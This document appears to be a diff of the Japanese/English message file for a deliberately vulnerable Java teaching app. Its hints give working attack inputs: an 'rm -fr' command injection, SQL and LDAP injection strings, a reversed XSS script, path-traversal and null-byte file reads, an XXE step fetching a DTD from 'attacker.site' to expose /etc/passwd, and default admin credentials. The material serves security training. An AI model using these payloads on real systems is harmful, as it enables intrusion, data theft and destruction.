+msg.not.xml.file=XML\u30d5\u30a1\u30a4\u30eb\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3002 +msg.note.brute.force=You can login with admin and password. The number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=\u3053\u306e\u30da\u30fc\u30b8\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u610f\u56f3\u3057\u306a\u3044\u30ea\u30af\u30a8\u30b9\u30c8\u3082\u53d7\u4fe1\u3057\u3066\u3001\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u3092\u5909\u66f4\u3057\u3066\u3057\u307e\u3044\u307e\u3059\u3002 +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection={}');java.lang.System.exit(0);//\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30b3\u30fc\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3067 JavaVM\u304c\u5f37\u5236\u7d42\u4e86\u3057\u307e\u3059\u3002 +msg.note.commandinjection=@Runtime@getRuntime().exec('rm -fr /your-important-dir/')\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30b5\u30fc\u30d0\u30fc\u4e0a\u306e\u91cd\u8981\u306a\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u304c\u524a\u9664\u3055\u308c\u307e\u3059\u3002 +msg.note.createobjects=\u5927\u304d\u306a\u6570\u5024\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e0d\u5fc5\u8981\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u751f\u6210\u306b\u3088\u308a\u3001\u5fdc\u7b54\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 msg.note.csrf=\u3053\u306e\u30da\u30fc\u30b8\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u610f\u56f3\u3057\u306a\u3044\u30ea\u30af\u30a8\u30b9\u30c8\u3082\u53d7\u4fe1\u3057\u3066\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5909\u66f4\u3057\u3066\u3057\u307e\u3044\u307e\u3059\u3002 msg.note.dangerous.file.inclusion=\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u3092template\=[\u60aa\u610f\u306e\u3042\u308bJSP\u30d5\u30a1\u30a4\u30eb\u304c\u30c7\u30d7\u30ed\u30a4\u3055\u308c\u305fURL]\u306b\u5909\u66f4\u3059\u308b\u3068\u3001\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002 msg.note.db.connection.leak.occur=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.deadlock=\u3053\u306e\u30da\u30fc\u30b8\u3092\u9023\u7d9a\u3067\u6570\u56de\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you sort in the descending order and click the "update" button on the other, then deadlock occurs in database. msg.note.endlesswaiting=\u5927\u304d\u306a\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u5b8c\u4e86\u3057\u306a\u3044\u30d7\u30ed\u30bb\u30b9\u306e\u5f85\u6a5f\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.createobjects=\u5927\u304d\u306a\u6570\u5024\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e0d\u5fc5\u8981\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u751f\u6210\u306b\u3088\u308a\u3001\u5fdc\u7b54\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 -msg.note.roundofferror=1\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e38\u3081\u8aa4\u5dee\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.truncationerror=3\u30017\u30019\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6253\u3061\u5207\u308a\u8aa4\u5dee\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.lossoftrailingdigits=0.0000000000000001\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u60c5\u5831\u6b20\u843d\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.commandinjection=@Runtime@getRuntime().exec('rm -fr /your-important-dir/')\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30b5\u30fc\u30d0\u30fc\u4e0a\u306e\u91cd\u8981\u306a\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u304c\u524a\u9664\u3055\u308c\u307e\u3059\u3002 -msg.note.not.use.ext.db=\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u306f\u3001MySQL\u306a\u3069\u306e\u5916\u90e8RDBMS\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u306b\u306e\u307f\u767a\u751f\u3057\u307e\u3059\u3002\u5916\u90e8RDBMS\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u306f\u3001application.properties\u3092\u7de8\u96c6\u3057\u3066\u4e0b\u3055\u3044\u3002 -msg.note.path.traversal=\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u3092template\=../uid/adminpassword.txt?\u306b\u5909\u66f4\u3059\u308b\u3068\u3001\u3053\u306e\u30da\u30fc\u30b8\u306badminpassword.txt\u306e\u5185\u5bb9\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 +msg.note.filedescriptorleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30d5\u30a1\u30a4\u30eb\u30c7\u30a3\u30b9\u30af\u30ea\u30d7\u30bf\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.intoverflow=63\u4ee5\u4e0a\u306e\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6574\u6570\u30aa\u30fc\u30d0\u30fc\u30d5\u30ed\u30fc\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.session.fixation=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n\u3053\u306e\u30da\u30fc\u30b8\u3067\u306fCookie\u3092\u6271\u3048\u306a\u3044\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u3092\u30b5\u30dd\u30fc\u30c8\u3059\u308b\u76ee\u7684\u3067URL\u30ea\u30e9\u30a4\u30c8\u304c\u6a5f\u80fd\u3057\u307e\u3059\u3002\u305d\u308c\u306b\u3088\u308a\u3001\u30bb\u30c3\u30b7\u30e7\u30f3\u56fa\u5b9a\u653b\u6483\u304c\u53ef\u80fd\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u3002 -msg.note.slowregex=\u6587\u5b57\u5217\u306baaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u69cb\u6587\u89e3\u6790\u306b\u6570\u5341\u79d2\u304b\u308a\u307e\u3059\u3002
\n \u6587\u5b57\u5217\u306baaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u5fdc\u7b54\u304c\u8fd4\u3089\u306a\u304f\u306a\u308a\u307e\u3059\u3002 -msg.note.strplusopr=+(\u30d7\u30e9\u30b9)\u6f14\u7b97\u5b50\u3067\u6587\u5b57\u5217\u3092\u9023\u7d50\u3057\u3066\u3044\u308b\u305f\u3081\u3001\u5927\u304d\u306a\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5217\u751f\u6210\u306b\u6570\u5341\u79d2\u304b\u308a\u307e\u3059\u3002 -msg.note.deadlock2=2\u3064\u306e\u30a6\u30a4\u30f3\u30c9\u30a6\u307e\u305f\u306f\u30bf\u30d6\u3092\u958b\u304d\u3001\u4e00\u65b9\u3067\u30e6\u30fc\u30b6\u30fcID\u3092\u964d\u9806\u306b\u30bd\u30fc\u30c8\u3057\u3066\u300c\u66f4\u65b0\u300d\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3057\u305f\u76f4\u5f8c\u306b\u3001\u3082\u3046\u4e00\u65b9\u3067\u6607\u9806\u306e\u307e\u307e\n\u300c\u66f4\u65b0\u300d\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u3067\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.sqlijc=Mark\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6697\u8a3c\u756a\u53f7\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002\n\u30d1\u30b9\u30ef\u30fc\u30c9\u306b' OR '1'\='1\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4ed6\u306e\u30e6\u30fc\u30b6\u30fc\u306e\u60c5\u5831\u304c\u8868\u793a\u3067\u304d\u307e\u3059\u3002 -msg.note.ldap.injection=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n*)(|(objectClass\=*\u3001aaaaaaa)\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u8a8d\u8a3c\u3092\u8fc2\u56de\u3057\u3066\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002 +msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.lossoftrailingdigits=0.0000000000000001\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u60c5\u5831\u6b20\u843d\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.mailheaderinjection=\u30d6\u30e9\u30a6\u30b6\u306e\u958b\u767a\u8005\u30e2\u30fc\u30c9\u3067\u4ef6\u540d\u306einput\u30bf\u30b0\u3092textarea\u30bf\u30b0\u306b\u5909\u66f4\u3057\u3001\u300c[\u4efb\u610f\u4ef6\u540d][\u6539\u884c]Bcc\: [\u4efb\u610f\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9]\u300d\u3092\u5165\u529b\u3057\u3066\u9001\u4fe1\u3059\u308b\u3068\u3001[\u4efb\u610f\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9]\u306b\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3067\u304d\u307e\u3059\u3002 +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.note.mojibake=\u6587\u5b57\u5217\u306b\u65e5\u672c\u8a9e\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5316\u3051\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.nullbyteinjection=\u30d0\u30fc\u30b8\u30e7\u30f31.7.0_40\u3088\u308a\u524d\u306eJava\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u5834\u5408\u3001\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u306bfileName\=../WEB-INF/web.xml%00\u3092\u4ed8\u52a0\u3059\u308b\u3068\u3001web.xml\u306e\u5185\u5bb9\u3092\u542b\u3080\u30d5\u30a1\u30a4\u30eb\u304c\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3067\u304d\u307e\u3059\u3002 -msg.note.open.redirect=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u306bgoto\=[\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30c8\u306eURL]\u3092\u4ed8\u52a0\u3059\u308b\u3068\u3001\u30c1\u30a7\u30c3\u30af\u305b\u305a\u306b\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30c8\u306eURL\u306b\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u3057\u307e\u3059\u3002 msg.note.netsocketleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30bd\u30b1\u30c3\u30c8\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.unrestrictedextupload=<% System.exit(0); %>\u3068\u66f8\u3044\u305fJSP\u30d5\u30a1\u30a4\u30eb(\u30d5\u30a1\u30a4\u30eb\u540d\uff1aexit.jsp)\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3066\u3001http\://localhost\:8080/uploadFiles/exit.jsp\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3068\u3001\nJavaVM\u304c\u5f37\u5236\u7d42\u4e86\u3057\u307e\u3059\u3002 -msg.note.clientinfo=\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u30ea\u30b9\u30c6\u30a3\u30f3\u30b0\u304c\u6a5f\u80fd\u3057\u3066\u3044\u308b\u5834\u5408\u3001http\://localhost\:8080/uid/\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3068\u3001\u305d\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u5185\u306e\u30d5\u30a1\u30a4\u30eb\u4e00\u89a7\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002\n\u3055\u3089\u306bhttp\://localhost\:8080/uid/adminpassword.txt\u306b\u8a18\u8f09\u3055\u308c\u305f\u30a2\u30ab\u30a6\u30f3\u30c8\u3067\u30ed\u30b0\u30a4\u30f3\u3059\u308b\u3068\u3001http\://localhost\:8080/uid/serverinfo.jsp\u3078\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 +msg.note.not.use.ext.db=\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u306f\u3001MySQL\u306a\u3069\u306e\u5916\u90e8RDBMS\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u306b\u306e\u307f\u767a\u751f\u3057\u307e\u3059\u3002\u5916\u90e8RDBMS\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u306f\u3001application.properties\u3092\u7de8\u96c6\u3057\u3066\u4e0b\u3055\u3044\u3002 +msg.note.nullbyteinjection=\u30d0\u30fc\u30b8\u30e7\u30f31.7.0_40\u3088\u308a\u524d\u306eJava\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u5834\u5408\u3001\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u306bfileName\=../WEB-INF/web.xml%00\u3092\u4ed8\u52a0\u3059\u308b\u3068\u3001web.xml\u306e\u5185\u5bb9\u3092\u542b\u3080\u30d5\u30a1\u30a4\u30eb\u304c\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3067\u304d\u307e\u3059\u3002 +msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. +msg.note.path.traversal=\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u3092template\=../uid/adminpassword.txt?\u306b\u5909\u66f4\u3059\u308b\u3068\u3001\u3053\u306e\u30da\u30fc\u30b8\u306badminpassword.txt\u306e\u5185\u5bb9\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 +msg.note.roundofferror=1\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e38\u3081\u8aa4\u5dee\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 +msg.note.strplusopr=+(\u30d7\u30e9\u30b9)\u6f14\u7b97\u5b50\u3067\u6587\u5b57\u5217\u3092\u9023\u7d50\u3057\u3066\u3044\u308b\u305f\u3081\u3001\u5927\u304d\u306a\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5217\u751f\u6210\u306b\u6570\u5341\u79d2\u304b\u308a\u307e\u3059\u3002 +msg.note.threadleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.truncationerror=3\u30017\u30019\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6253\u3061\u5207\u308a\u8aa4\u5dee\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u53ef\u80fd\u306a\u30d5\u30a1\u30a4\u30eb\u30b5\u30a4\u30ba\u306e\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001DoS\u653b\u6483\u306a\u3069\u306b\u5bfe\u3057\u3066\u8106\u5f31\u3067\u3059\u3002 -msg.note.verbose.errror.message=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n\u3053\u306e\u753b\u9762\u3067\u306e\u8a8d\u8a3c\u30a8\u30e9\u30fc\u306e\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u8a73\u7d30\u904e\u304e\u308b\u305f\u3081\u3001\u30ed\u30b0\u30a4\u30f3\u53ef\u80fd\u306a\u30a2\u30ab\u30a6\u30f3\u30c8\u304c\u63a8\u6e2c\u3057\u3084\u3059\u304f\u306a\u3063\u3066\u3044\u307e\u3059\u3002 +msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=\u4ee5\u4e0b\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30b5\u30fc\u30d0\u30fc\u30ea\u30bd\u30fc\u30b9\u3092\u6d6a\u8cbb\u3057\u307e\u3059\u3002 msg.note.xss=\u540d\u524d\u306b>tpircs/<;)eikooc.tnemucod(trela>tpIrcs<\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30bb\u30c3\u30b7\u30e7\u30f3ID\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 msg.note.xxe.step1=\u3053\u306e\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u30a2\u30af\u30bb\u30b9\u3067\u304d\u308bWeb\u30b5\u30fc\u30d0\u30fc\u306b\u6b21\u306eDTD\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u4f8b) http\://attacker.site/vulnerable.dtd msg.note.xxe.step2=\u6b21\u306b\u4ee5\u4e0b\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001Linux\u30b5\u30fc\u30d0\u30fc\u306e\u30d1\u30b9\u30ef\u30fc\u30c9\u30d5\u30a1\u30a4\u30eb(/etc/passwd)\u304c\u8868\u793a\u3067\u304d\u307e\u3059\u3002 -msg.not.image.file=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3002 -msg.not.match.regular.expression=\u5165\u529b\u6587\u5b57\u5217\u306f\u6b63\u898f\u8868\u73fe\u306b\u4e00\u81f4\u3057\u307e\u305b\u3093\u3002 -msg.not.xml.file=XML\u30d5\u30a1\u30a4\u30eb\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3002 -msg.mail.changed=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u306f\u6b63\u5e38\u306b\u5909\u66f4\u3055\u308c\u307e\u3057\u305f\u3002 -msg.mail.change.failed=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u306e\u5909\u66f4\u306b\u5931\u6557\u3057\u307e\u3057\u305f\u3002 -msg.mail.format.is.invalid=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u306e\u5f62\u5f0f\u304c\u4e0d\u6b63\u3067\u3059\u3002 -msg.mail.is.empty=\u4ef6\u540d\u3068\u672c\u6587\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 -msg.match.regular.expression=\u5165\u529b\u6587\u5b57\u5217\u306f\u6b63\u898f\u8868\u73fe\u306b\u4e00\u81f4\u3057\u307e\u3057\u305f\u3002 -msg.max.file.size.exceed=\u30d5\u30a1\u30a4\u30eb\u30b5\u30a4\u30ba\u304c\u8a31\u5bb9\u9650\u5ea6\u3092\u8d85\u3048\u3066\u3044\u307e\u3059\u3002 -msg.passwd.changed=\u30d1\u30b9\u30ef\u30fc\u30c9\u306f\u6b63\u5e38\u306b\u5909\u66f4\u3055\u308c\u307e\u3057\u305f\u3002 msg.passwd.change.failed=\u30d1\u30b9\u30ef\u30fc\u30c9\u306e\u5909\u66f4\u306b\u5931\u6557\u3057\u307e\u3057\u305f\u3002 +msg.passwd.changed=\u30d1\u30b9\u30ef\u30fc\u30c9\u306f\u6b63\u5e38\u306b\u5909\u66f4\u3055\u308c\u307e\u3057\u305f\u3002 msg.passwd.is.too.short=\u30d1\u30b9\u30ef\u30fc\u30c9\u306f8\u6841\u4ee5\u4e0a\u306b\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.password.not.match=\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u4e00\u81f4\u3057\u307e\u305b\u3093\u3002 -msg.permgen.space.leak.occur=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001{0}\u306e\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002\n\u753b\u9762\u3092\u30ed\u30fc\u30c9\u3057\u7d9a\u3051\u308b\u3068\u3001\u6700\u7d42\u7684\u306bOutOfMemoryError\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 +msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.question.reach.the.moon=0.1mm\u306e\u539a\u3055\u306e\u7d19\u3092\u4f55\u56de\u6298\u308a\u305f\u305f\u3080\u3068\u3001\u5730\u7403\u304b\u3089\u6708\u306e\u8ddd\u96e2(384,400km)\u306b\u5230\u9054\u3059\u308b\u3067\u3057\u3087\u3046\u304b\uff1f msg.reverse.color=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2\u3092\u884c\u3046\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 msg.reverse.color.complete=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2\u304c\u5b8c\u4e86\u3057\u307e\u3057\u305f\u3002 msg.reverse.color.fail=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2\u306b\u5931\u6557\u3057\u307e\u3057\u305f\u3002 +msg.select.upload.file=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u3092\u9078\u629e\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.sent.mail=\u30e1\u30fc\u30eb\u304c\u6b63\u5e38\u306b\u9001\u4fe1\u3055\u308c\u307e\u3057\u305f\u3002 msg.smtp.server.not.setup=\u30e1\u30fc\u30eb\u30d7\u30ed\u30d1\u30c6\u30a3\u304capplication.properties\u306b\u6b63\u3057\u304f\u8a2d\u5b9a\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002 msg.unknown.exception.occur=\u4f55\u3089\u304b\u306e\u4f8b\u5916\u304c\u767a\u751f\u3057\u307e\u3057\u305f \: {0} msg.update.records={0}\u4ef6\u66f4\u65b0\u3057\u307e\u3057\u305f\u3002 -msg.update.users.by.xml=\u6b21\u306e\u5f62\u5f0f\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u4e00\u62ec\u3067\u66f4\u65b0\u3067\u304d\u307e\u3059\u3002 msg.update.users=\u30e6\u30fc\u30b6\u30fc\u60c5\u5831\u3092\u4e00\u62ec\u3067\u66f4\u65b0\u3057\u307e\u3059\u3002 -msg.select.upload.file=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u3092\u9078\u629e\u3057\u3066\u4e0b\u3055\u3044\u3002 -msg.note.threadleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.user.not.exist=\u30e6\u30fc\u30b6\u30fc\u304c\u5b58\u5728\u3057\u307e\u305b\u3093\u3002 +msg.update.users.by.xml=\u6b21\u306e\u5f62\u5f0f\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u4e00\u62ec\u3067\u66f4\u65b0\u3067\u304d\u307e\u3059\u3002 msg.user.already.exist=\u65e2\u306b\u30e6\u30fc\u30b6\u30fc\u304c\u5b58\u5728\u3057\u307e\u3059\u3002 +msg.user.not.exist=\u30e6\u30fc\u30b6\u30fc\u304c\u5b58\u5728\u3057\u307e\u305b\u3093\u3002 msg.valid.json=\u6b63\u3057\u3044JSON\u6587\u5b57\u5217\u3067\u3059\u3002 msg.warn.enter.name.and.passwd=\u540d\u524d\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 -title.clickjacking.page=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u5909\u66f4 -title.csrf.page=\u30d1\u30b9\u30ef\u30fc\u30c9\u5909\u66f4 -title.clientinfo.page=\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u60c5\u5831 -title.design.test.page=\u30c7\u30b6\u30a4\u30f3\u30c6\u30b9\u30c8 -title.serverinfo.page=\u30b5\u30fc\u30d0\u30fc\u60c5\u5831 -style.name.bootstrap=Bootstrap + +section.errors=\u30a8\u30e9\u30fc +section.exceptions=\u975e\u30c1\u30a7\u30c3\u30af\u4f8b\u5916 +section.performance.issue=\u6027\u80fd\u554f\u984c +section.troubles=\u969c\u5bb3 +section.vulnerabilities=\u8106\u5f31\u6027 + +style.description.basic=\u30d9\u30fc\u30b7\u30c3\u30af\u306a\u30d8\u30c3\u30c0\u30fc\u3068\u30d5\u30c3\u30bf\u30fc\u304c\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002 style.description.bootstrap=\u8a73\u7d30\u306f\u6b21\u306e\u30da\u30fc\u30b8\u3092\u53c2\u7167\u4e0b\u3055\u3044\: http\://getbootstrap.com/ -style.name.google.mdl=Google Material Design Lite style.description.google.mdl=\u8a73\u7d30\u306f\u6b21\u306e\u30da\u30fc\u30b8\u3092\u53c2\u7167\u4e0b\u3055\u3044\: https\://getmdl.io/ -style.name.materialize=Materialize style.description.materialize=\u8a73\u7d30\u306f\u6b21\u306e\u30da\u30fc\u30b8\u3092\u53c2\u7167\u4e0b\u3055\u3044\: http\://materializecss.com/ -style.name.nonstyle=\u30b9\u30bf\u30a4\u30eb\u30b7\u30fc\u30c8\u672a\u6307\u5b9a +style.description.monochro=\u30e2\u30ce\u30af\u30ed\u306e\u30d8\u30c3\u30c0\u30fc\u3068\u30d5\u30c3\u30bf\u30fc\u304c\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002 +style.description.noframe=\u30d8\u30c3\u30c0\u30fc\u3068\u30d5\u30c3\u30bf\u30fc\u306f\u4f7f\u7528\u3055\u308c\u307e\u305b\u3093\u3002 